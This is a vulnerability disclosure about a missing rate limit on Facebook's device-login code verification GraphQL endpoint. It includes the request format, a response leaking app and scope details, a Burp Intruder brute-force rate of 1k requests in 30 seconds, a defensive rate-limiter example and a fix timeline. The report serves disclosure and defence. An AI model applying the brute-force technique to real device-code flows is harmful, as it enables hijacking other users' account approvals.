[Facebook] Device Code Verification missing rate limit

There was no rate limit on a GraphQL call that validated user codes for Facebook's Login for Devices feature (the flow where a TV or similar device shows a short code and the user approves it from another device).

POC -

Endpoint -

=================================

POST /v3.3/graphql?access_token=

Host: graph.facebook.com

doc_id=2400531753344072&format=json&method=post&variables={"shortCode":"123304"}

=================================

The response -

=================================

HTTP/1.1 200 OK

{"data":{"device_request_view":{"device_name":"","device_record":{"user_code":"123304","scope":"read_stream,publish_stream,user_photos,friends_photos,user_status,user_videos,friends_videos","auth_status":"ok","timestamp_expire":0,"code_type":null,"nonce":""},"application":{"name":"XXX","id":"XXX","square_logo":{"uri":"https:\/\/scontent.xx.fbcdn.net\/v\/t39.2080-6\/c0.0.129.129a\/p128x128\/851577_10151556502653700_1069381847_n.gif?_nc_cat=110&_nc_oc=AQnH03A0kVgSGcA9zSnc1r3ZlkjS3qOyQ_aWMQXsYdTOrbp13shMVwkaYYoN33IxDd4&_nc_ad=z-m&_nc_cid=2034&_nc_ht=scontent.xx&oh=56756b40ed65cc71725fa36aad4860cb&oe=5E491F85"}}}},"extensions":{"is_final":true}}

=================================

This would have allowed a malicious actor to brute-force a currently valid code and have the approval prompt pop up on the screen of a random device whose owner was trying to connect their account to a TV or similar device.

For a correct code, the response also gives away additional information: the device name, the requested scope, and the application's name and ID together with a link to its logo image.

Rate limit evaluation -

With Burp Intruder set to 50 threads it was possible to send 1k requests in just 30 seconds. The response was identical for every incorrect code and changed only for a correct one: the 4001st payload returned the same response as the 1st, and if the 4002nd payload hit the right code, it returned a response of a different length.
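As an added example (not Facebook's code and not part of the original report), a minimal verifier for such six-digit device codes with the per-client attempt limit the report found missing, plus the arithmetic on how long the code space takes to exhaust at the observed request rate. The attempt limit, window, client key and the pending record are assumed values.

```python
import time
from collections import defaultdict, deque

# Constructed example: a device-code verification endpoint with the
# per-client attempt limiting that the report found missing.
CODE_SPACE = 10 ** 6      # six-digit user codes such as "123304"
MAX_ATTEMPTS = 10         # failed lookups allowed per client per window (assumed)
WINDOW_SECONDS = 60       # sliding window length (assumed)

# Pending device authorisations keyed by user code (constructed data).
PENDING = {"123304": {"device_name": "", "scope": "read_stream,user_photos",
                      "application": {"name": "XXX", "id": "XXX"}}}

class DeviceCodeVerifier:
    def __init__(self, max_attempts=MAX_ATTEMPTS, window=WINDOW_SECONDS, clock=time.time):
        self.max_attempts = max_attempts
        self.window = window
        self.clock = clock                    # injectable for testing
        self.failures = defaultdict(deque)    # client -> timestamps of failed attempts

    def _recent_failures(self, client, now):
        q = self.failures[client]
        while q and now - q[0] > self.window:  # drop attempts outside the window
            q.popleft()
        return q

    def verify(self, client, short_code):
        """client: caller identity (e.g. access-token hash plus source IP).
        Returns (status, payload); wrong and blocked lookups share one payload
        shape so response length does not reveal whether a code exists."""
        now = self.clock()
        q = self._recent_failures(client, now)
        if len(q) >= self.max_attempts:
            return "rate_limited", {"device_request_view": None}
        record = PENDING.get(short_code)
        if record is None:
            q.append(now)                     # only failures count against the limit
            return "not_found", {"device_request_view": None}
        return "ok", {"device_request_view": record}

def seconds_to_exhaust(requests, seconds, code_space=CODE_SPACE):
    """Worst-case time to try every code at an observed rate (1k per 30 s here)."""
    return code_space * seconds / requests

def seconds_to_exhaust_limited(max_attempts=MAX_ATTEMPTS, window=WINDOW_SECONDS,
                               code_space=CODE_SPACE):
    """Same brute force once each client gets only max_attempts per window."""
    return code_space * window / max_attempts
```

A lockout keyed on the access token alone is not enough on its own, since the caller controls that token; the client key should also fold in the source address or another identity the caller cannot freely rotate.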

Timeline -

Reported - Saturday, November 16, 2019

Triaged - Wednesday, November 20, 2019

Fixed - Tuesday, December 3, 2019 

Rewarded - Wednesday, December 4, 2019 
